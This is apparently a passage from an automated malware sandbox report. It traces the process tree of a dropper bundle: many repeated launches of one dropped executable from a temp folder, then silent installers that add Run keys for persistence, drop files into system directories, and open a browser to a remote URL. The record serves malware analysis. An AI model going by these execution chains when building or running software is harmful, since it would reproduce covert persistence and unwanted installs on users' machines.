- Executes dropped EXE
PID:1904
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵
- Executes dropped EXE
PID:4000
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵
- Executes dropped EXE
PID:5696 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5696 -s 283⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:5344
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵
- Executes dropped EXE
PID:2016
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵
- Executes dropped EXE
PID:2540
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵
- Executes dropped EXE
PID:3896
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵
- Executes dropped EXE
PID:3988
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵
- Executes dropped EXE
PID:4292
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵
- Executes dropped EXE
PID:5540
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵
- Executes dropped EXE
PID:5008
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵
- Executes dropped EXE
PID:4576
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵
- Executes dropped EXE
PID:5436
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:5316
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:5176
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:5500
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:1380
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:980
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:5968
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:4144
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:3820
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:5456
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:4344
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:2116
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:1420
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:5964
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:4208
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:3804
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:6068
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:3012
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:3988
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:436
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:5676
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:4732
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:812
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:3720
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:5608
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:1404
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:3420
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:3020
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:2352
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:1520
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:5412
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:5260
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:4684
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:2696
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:4936
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:2340
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:3532
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:3236
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:768
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:5904
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:476
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:5184
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:5580
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:860
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:1948
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:1732
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:1424
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:4932
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:5920
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:5624
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:4332
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:4872
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:3156
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:2604
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2604 -s 283⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6132
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:924
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:3976
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:2124
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:1904
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:3132
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:1392
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:5876
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:3000
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:4208
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4208 -s 283⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3708
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:700
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:1440
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:1372
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:3180
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:1280
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:5780
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:476
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:2728
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:4612
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:5448
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:1600
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:1392
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:2128
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:4048
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:4696
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:1964
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:1680
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1680 -s 283⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1568
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:4396
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:6096
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:1904
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:6012
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:4208
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:2228
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:2304
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:1212
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:5076
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:4652
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:4200
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:1232
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:2604
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:5168
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:5516
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:6128
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:2400
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:5592
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:4832
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:5424
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:3052
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:3556
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:672
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:4240
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:5832
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:5776
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:4376
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exeC:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11e4e580f2e8141a3.exe2⤵PID:1436
-
-
C:\Users\Admin\AppData\Local\Temp\is-HPFC2.tmp\Tue11b9d76a96506.tmp"C:\Users\Admin\AppData\Local\Temp\is-HPFC2.tmp\Tue11b9d76a96506.tmp" /SL5="$20208,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS0B254883\Tue11b9d76a96506.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5016 -
C:\Users\Admin\AppData\Local\Temp\is-5MM1A.tmp\46807GHF____.exe"C:\Users\Admin\AppData\Local\Temp\is-5MM1A.tmp\46807GHF____.exe" /S /UID=burnerch22⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:2164 -
C:\Program Files\Reference Assemblies\FPGTYEQTNK\ultramediaburner.exe"C:\Program Files\Reference Assemblies\FPGTYEQTNK\ultramediaburner.exe" /VERYSILENT3⤵
- Executes dropped EXE
PID:6052 -
C:\Users\Admin\AppData\Local\Temp\is-95A8S.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-95A8S.tmp\ultramediaburner.tmp" /SL5="$302CE,281924,62464,C:\Program Files\Reference Assemblies\FPGTYEQTNK\ultramediaburner.exe" /VERYSILENT4⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:832 -
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu5⤵
- Executes dropped EXE
PID:3252
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\b8-16d4c-bbb-3a482-1b78a7bd9da57\Jysumopolae.exe"C:\Users\Admin\AppData\Local\Temp\b8-16d4c-bbb-3a482-1b78a7bd9da57\Jysumopolae.exe"3⤵
- Executes dropped EXE
PID:988 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e64⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious use of FindShellTrayWindow
PID:6016 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffd5d046f8,0x7fffd5d04708,0x7fffd5d047185⤵PID:5160
-
-
